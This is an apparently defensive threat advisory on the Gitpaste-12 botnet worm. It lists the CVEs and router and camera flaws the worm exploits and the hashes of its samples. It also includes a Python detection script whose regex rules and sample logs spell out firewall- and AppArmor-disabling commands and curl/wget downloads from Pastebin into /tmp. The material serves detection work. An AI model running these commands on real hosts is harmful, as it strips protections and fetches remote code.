Advisory | Malware Intelligence |
Malware | Gitpaste-12 |
Targets | x86_Linux Servers/Linux ARM&MIPS (IoT) |
Gitpaste-12 is a wormable malware that can form a network of bots for crypto-mining. It is also capable of cracking passwords by brute force and of using exploits for known vulnerabilities on infected hosts. The malware uses GitHub and Pastebin to host its code and payload, and uses Pastebin as its Command and Control (C&C) channel to control its victims.
As part of defence evasion, the malware disables firewalls, monitoring solutions, Linux AppArmor, etc., to prepare the environment for further compromise. It also targets lower-end ARM and MIPS systems, especially IoT devices.
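A detection sketch for the behaviour described above, added here as an example and not taken from the advisory: it flags hosts where a firewall or AppArmor is switched off within a short window of a download from a paste or raw-GitHub URL. The command patterns, the log format, the 10-minute window, the host names and the paste ID are all assumptions; the advisory does not list the exact commands used.

```python
import re
from datetime import datetime, timedelta

# Assumed patterns (not listed in the advisory): common commands that switch
# off a host firewall or AppArmor, and downloads from paste / raw-GitHub hosts.
RULES = {
    "firewall_off": re.compile(
        r"ufw\s+disable|iptables\s+(-F|--flush)|systemctl\s+(stop|disable)\s+(firewalld|ufw)"),
    "apparmor_off": re.compile(
        r"service\s+apparmor\s+(stop|teardown)|systemctl\s+(stop|disable)\s+apparmor|aa-teardown"),
    "paste_fetch": re.compile(
        r"\b(curl|wget)\b.*(pastebin\.com/raw/|raw\.githubusercontent\.com/)"),
}
EVASION = {"firewall_off", "apparmor_off"}
WINDOW = timedelta(minutes=10)  # assumed correlation window
LINE = re.compile(r'^(\S+) host=(\S+) cmd="(.*)"$')  # constructed log format

def scan(lines):
    """Return {host: [rule names]} for hosts where protections were disabled
    within WINDOW of a fetch from a paste or raw-GitHub URL."""
    hits = {}
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # not a process-execution record in the expected format
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        for name, rx in RULES.items():
            if rx.search(m.group(3)):
                hits.setdefault(m.group(2), []).append((ts, name))
    flagged = {}
    for host, events in hits.items():
        fetches = [t for t, n in events if n == "paste_fetch"]
        near = {n for t, n in events
                if n in EVASION and any(abs(t - f) <= WINDOW for f in fetches)}
        if near:
            flagged[host] = sorted(near | {"paste_fetch"})
    return flagged

# Constructed sample records; host names and the paste ID are placeholders.
SAMPLE = [
    '2020-11-05T10:00:01Z host=cam-07 cmd="ufw disable"',
    '2020-11-05T10:00:03Z host=cam-07 cmd="service apparmor stop"',
    '2020-11-05T10:00:09Z host=cam-07 cmd="curl -s https://pastebin.com/raw/PLACEHOLDER -o /tmp/x"',
    '2020-11-05T09:00:00Z host=web-01 cmd="iptables -F"',
    '2020-11-05T12:30:00Z host=web-01 cmd="wget https://pastebin.com/raw/PLACEHOLDER"',
    '2020-11-05T11:00:00Z host=dev-02 cmd="wget https://raw.githubusercontent.com/example/repo/main/install.sh"',
]

if __name__ == "__main__":
    for host, rules in scan(SAMPLE).items():
        print(host, rules)
```

Requiring both signals close together keeps routine firewall maintenance (web-01) and ordinary script downloads (dev-02) from alerting on their own.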
CVE-2017-14135 | Webadmin plugin for opendreambox |
CVE-2020-24217 | HiSilicon based IPTV/H.264/H.265 video encoder |
CVE-2017-5638 | Apache Struts |
CVE-2020-10987 | Tenda router |
CVE-2014-8361 | Miniigd SOAP service in Realtek SDK |
CVE-2020-15893 | UPnP in dlink routers |
CVE-2013-5948 | Asus routers |
EDB-ID: 48225 | Netlink GPON Router |
EDB-ID: 40500 | AVTECH IP Camera |
CVE-2019-10758 | MongoDB |
CVE-2017-17215 | Huawei router |
Note: EDB-ID: Exploit Database ID
URLs
Service Ports
Hashes (SHA-256)
E67f78c479857ed8c562e576dcc9a8471c5f1ab4c00bb557b1b9c2d9284b8af9
Ed4868ba445469abfa3cfc6c70e8fdd36a4345c21a3f451c7b65d6041fb8492b
Bd5e9fd8215f80ca49c142383ba7dbf7e24aaf895ae25af96bdab89c0bdcc3f1
5d1705f02cde12c27b85a0104cd76a39994733a75fa6e1e5b014565ad63e7bc3